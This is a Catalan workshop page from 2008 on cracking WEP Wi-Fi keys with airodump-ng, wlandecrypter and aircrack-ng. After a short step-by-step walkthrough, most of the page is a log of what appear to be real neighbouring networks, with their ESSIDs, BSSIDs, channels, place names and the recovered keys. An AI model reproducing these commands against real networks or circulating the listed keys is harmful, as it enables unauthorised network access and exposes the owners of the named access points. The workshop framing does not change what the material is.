Aircrack

Taller de desencriptació de Claus WEP (Sergi Tur), Festa Ubuntu 9.04: Fitxer:TallerClausWEP.pdf

els executables aircrack-ng i airodump estan a

/usr/sbin
(compte perquè no es llisten)
un cop estem en aquest directori,
# cd /usr/sbin
# ls -la

---

1) Airodump

sbin$ airodump-ng --help
opcions:
--ivs save only captured IVs
--write <prefix> -> dum file prefix

sbin$ airodump-ng --write hola eth3
si vols grabar el fitxer en el disc intern:
sbin$ airodump-ng --write mnt/sda2/hola eth3
(substituir sda2 pel disc que correspongui)

la columna que importa és #Data

agafo la següent:

essid: WLAN_4E

bssid: 00:01:38:9A:C2:83

canal 6

WEP

paro el airodump (Ctrl-C) quan tinc 64 paquets (per desencriptar les WLAN_ amb 5 n'hi ha d'haver prou). Tinc els fitxers hola-01.cap i hola-01.txt en el mateix directori

$ ls hola*

---

2) fem el diccionari

sbin$ wlandecrypter --help
wlandecrypter <bssid> <essid> [output file]
wlandecrypter 00:01:38:9A:C2:83 WLAN_4E diccionari.txt
S'ha generat el fitxer diccionari.txt
$ ls diccionari.txt
$ cat diccionari.txt

---

3) aircrack

sbin$ aircrack-ng --help
opcions: 
-a 1 (força atacc WEP)
-b <bssid> la MAC
-e <essid> la interfície
sbin$ aircrack-ng -a 1 -b <mac> -e <essid> -w diccionari <fitxer.cap>
sbin$ aircrack-ng -a 1 -b 00:01:38:9A:C2:83 -e WLAN_4E -w diccionari.txt hola-01.cap

KEY FOUND!!
58:30:30:30:31:33:38:41:45:42:31:34:45
ASCII: X000138AEB14E

Altres:

essid: WLAN_44
bssid: 00:60:B3:F3:D3:54
canal 9
WEP
wlandecrypter 00:60:B3:F3:D3:54 WLAN_44 diccionari.txt
aircrack-ng -a 1 -b 00:60:B3:F3:D3:54 -e WLAN_44 -w diccionari.txt hola2-01.cap
KEY FOUND!!
5A:30:30:31:33:34:39:35:45:36:34:34:34
ascii: Z0013495E6444

essid: WLAN76A516
bssid: 00:13:F7:97:6A:20
canal 2
WEP
wlandecrypter 00:13:F7:97:6A:20 WLAN76A516 diccionari.txt
aircrack-ng -a 1 -b 00:13:F7:97:6A:20 -e WLAN76A516 -w diccionari.txt hola2-01.cap

essid: WLAN_B0
bssid: 00:02:CF:65:BA:D6
canal 9
WEP
wlandecrypter 00:02:CF:65:BA:D6 WLAN_B0 diccionari.txt
aircrack-ng -a 1 -b 00:02:CF:65:BA:D6 -e WLAN_B0 -w diccionari.txt hola-01.cap
KEY FOUND!!
5A:30:30:30:32:43:46:36:38:37:31:42:30
ASCII: Z0002CF6871B0

essid: WLAN_C2
bssid: 00:01:38:B9:E5:3D
canal 9
WEP
wlandecrypter 00:01:38:B9:E5:3D WLAN_C2 diccionari.txt
aircrack-ng -a 1 -b 00:01:38:B9:E5:3D -e WLAN_C2 -w diccionari.txt hola-01.cap
KEY FOUND!!
58:30:30:30:31:33:38:42:41:38:45:43:32
ASCII: X000138BA8EC2

essid: WLAN_BC
bssid: 00:02:CF:55:B0:0D
canal 9
WEP
wlandecrypter 00:02:CF:55:B0:0D WLAN_BC diccionari.txt
aircrack-ng -a 1 -b 00:02:CF:55:B0:0D -e WLAN_BC -w diccionari.txt hola-01.cap
KEY FOUND!
5A:30:30:30:32:43:46:35:37:35:41:42:43
ASCII: Z0002CF575ABC

essid: WLAN_70
ASCII: Z0002CFC19070

essid: WLAN_5C
ASCII: X000138C2245C

essid: WLAN_92
ASCII: Z0002CF6C9992

essid: WLAN_52
ASCII: X000138C67152

essid: WLAN_B2
ASCII: Z0002CFDA8DB2

essid: WLAN_9A
ASCII: Z0013497A829A

Bagà

essid: Germanes_Dominiques
bssid: 00:1E:2A:19:07:5A
canal 13
WEP
wlandecrypter 00:1E:2A:19:07:5A Germanes_Dominiques diccionari.txt
aircrack-ng -a 1 -b 00:1E:2A:19:07:5A -e Germanes_Dominiques hola-04.cap
KEY FOUND!!
5A:30:30:31:33:34:39:35:45:36:34:34:34
ascii: Z0013495E6444

essid: WLAN_EE
bssid: 00:02:CF:79:36:A0
canal 9
WEP
wlandecrypter 00:02:CF:79:36:A0 WLAN_EE diccionari.txt
aircrack-ng -a 1 -b 00:02:CF:79:36:A0 -e WLAN_EE -w diccionari.txt hola-08.cap
KEY FOUND!!
5A:30:30:30:32:43:46:37:38:43:43:45:45 ] (ASCII: Z0002CF78CCEE )

WLAN_28: 5A303030324346394230443238

Local

essid: WLAN_1F
bssid: 
canal 2
WEP
KEY FOUND!!
5A:30:30:31:33:34:39:35:44:42:41:31:46
ascii: Z0013495DBA1F

essid: WLAN_00
bssid: 
canal 2?
WEP
KEY FOUND!!
ascii: Z0002CF78D100

Viaplana

essid: Tele2
IX1V9417358

---

creat per Joan Quintana Compte, abril 2008